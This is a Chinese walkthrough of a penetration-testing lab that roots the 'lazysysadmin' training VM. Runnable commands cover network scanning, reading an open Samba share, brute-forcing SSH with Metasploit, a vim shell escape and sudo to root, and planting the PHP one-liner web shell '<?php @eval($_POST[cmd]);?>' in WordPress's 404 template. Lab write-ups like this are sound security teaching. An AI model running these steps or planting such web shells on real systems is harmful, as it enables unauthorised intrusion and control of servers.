IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 靶机渗透【lazysysadmin】 -> 正文阅读

[PHP知识库]靶机渗透【lazysysadmin】

一. lazysysadmin靶机安装

1. 下载靶机

  • 百度网盘链接提取码

lazysysadmin.zip
提取码:m02v

2. 打开靶机

  • 打开 VMware,在左上角选择 - - 文件 - - 打开
    在这里插入图片描述

  • 找到 lazysysadmin 靶机解压位置
    在这里插入图片描述

  • 开启后如图所示
    在这里插入图片描述

二. lazysysadmin靶机渗透

  • 开启一台 Kali
    Kali(IP):192.168.110.151

若未安装 Kali 可点击此处进行安装
虚拟机安装【Kali】(2018/2021)

1. 信息收集

1)扫描IP

arp-scan -l

发现目标 IP:192.168.110.153
在这里插入图片描述
2)扫描端口

masscan --rate=10000 --ports 0-65535 192.168.110.153

发现目标开启 139,6667,3306,22,80,445 端口
在这里插入图片描述
3)扫描服务

nmap -T4 -sV -O -p 139,6667,3306,22,80,445 192.168.110.153

发现目标开启 ssh,http,共享,mysql 等服务
在这里插入图片描述
4)扫描域名目录

dirb http://192.168.110.153

发现以下有用信息:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

经过信息收集后,我们有大致四种思路:Web,共享服务,ssh服务,数据库
以下将从不同思路切入渗透

2. Web渗透

拿到网站目录后,我们进行一一查看登录

1)http://192.168.110.153

浏览后发现没有可用信息
在这里插入图片描述
2)http://192.168.110.153/info.php

发现PHP配置文件
在这里插入图片描述
3)http://192.168.110.153/phpmyadmin/

发现数据库登录窗口
在这里插入图片描述
4)http://192.168.110.153/robots.txt

这是一个反爬虫网页,一一访问并无收获
在这里插入图片描述
5)http://192.168.110.153/wordpress/
在这里插入图片描述
发现疑似用户名信息
在这里插入图片描述
点击 Hello world! 字样来到如下界面,观察网址
在这里插入图片描述

6)http://192.168.110.153/wordpress/wp-admin/

进入后台登录点
在这里插入图片描述

  • 尝试使用弱口令登录

在这里插入图片描述

  • 利用之前发现的 togie 信息作为用户名再次尝试

在这里插入图片描述

虽然都登录失败,但结合两次对比,我们发现用户名为 togie 时,显示无效用户名,但用户名为 admin 时,显示不正确,不难猜出,admin 可能为其一用户名,发现了用户名枚举漏洞

7)http://192.168.110.153/wordpress/wp-includes/

发现一个目录页面
在这里插入图片描述

在 Web 渗透中,我们发现还是缺乏部分信息,暂时切换思路

3. 共享服务

enum4linux介绍

  • enum.exe的Linux替代软件,用于枚举Windows和Samba主机中的数据
  • 主要特性:
    RID循环(当Windows 2000上的RestrictAnonymous设置为1时)
    用户列表(当Windows 2000上的RestrictAnonymous设置为0时)
    组成员信息列表
    共享枚举
    检测主机是否在工作组或域中
    识别远程操作系统
    密码策略检索(使用polenum)

1)打开新终端

enum4linux 192.168.110.153
在这里插入图片描述
在这里插入图片描述

  • 发现共享登录为空用户名密码,找到共享路径

在这里插入图片描述
2)使用网络远程挂载

mount -t cifs -o username=' ',password=' ' //192.168.110.153/share$ /media
在这里插入图片描述
3)进入挂载位置查看

cd /media
ls
cat deets.txt
在这里插入图片描述

  • 发现初始备用密码:12345

4. ssh服务

1)准备暴力破解的用户名密码字典

vim user.txt /usr/share/wordlists/dirb

在这里插入图片描述
vim pass.txt /usr/share/wordlists/dirb
在这里插入图片描述
2)进入漏洞库

msfconsole
在这里插入图片描述
3)搜索 ssh 登录

search ssh_login
在这里插入图片描述
4)拿下路径,暴力破解

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.110.153
set user_file /usr/share/wordlists/dirb/user.txt
set pass_file /usr/share/wordlists/dirb/pass.txt
set verbose true
run
在这里插入图片描述
5)破解成功

togie 12345
在这里插入图片描述
6)连接 ssh

ssh togie@192.168.110.153
12345
在这里插入图片描述
7)查看信息

cat /etc/issue
cd /tmp
在这里插入图片描述

这时我们发现切换目录收到限制,使用 vim 编译器重新打开一个终端

vim
:set shell=/bin/bash
回车
:shell

发现新开启一行终端

cd /tmp
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
groups
在这里插入图片描述
发现用户拥有 sudo 权限
在这里插入图片描述

sudo su root

使用先前发现的备用密码

12345
在这里插入图片描述

5. 文件上传

回到 /media 终端窗口,查看 wordpress 配置文件

cd wordpress
ls
cat wp-config.php
在这里插入图片描述

发现数据库用户名密码,与我们先前猜想一致

在这里插入图片描述

返回数据库,登录

http://192.168.110.153/phpmyadmin/
在这里插入图片描述
在这里插入图片描述

尝试查看数据库信息,可惜没有读取权限

在这里插入图片描述

想到之前在后台测试点发现的用户名枚举漏洞,用户名正好为 Admin,故尝试相同密码登录后台,发现登录成功

http://192.168.110.153/wordpress/wp-admin/
在这里插入图片描述
在这里插入图片描述

寻找信息,在编辑一栏中发现了 404 页面源码,因为 404 页面较隐蔽、为 php 且不确定其他页面路径,所以我们在 404 页面上传一句话木马

在这里插入图片描述
<?php @eval($_POST[cmd]);?>
在这里插入图片描述
在这里插入图片描述

接下来只需触发 404 页面即可,在 wordpress 前端界面任意跟链接,找到先前发现的?p=1网页

在这里插入图片描述
成功触发 404 页面,意味着木马上传成功
在这里插入图片描述

打开中国菜刀工具,进行连接

右键 - 添加 - 复制网址 - 如图选择 - 添加
在这里插入图片描述
在这里插入图片描述
成功连接
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章           查看所有文章
加:2022-01-16 12:49:24  更:2022-01-16 12:51:48 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 4:55:28-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计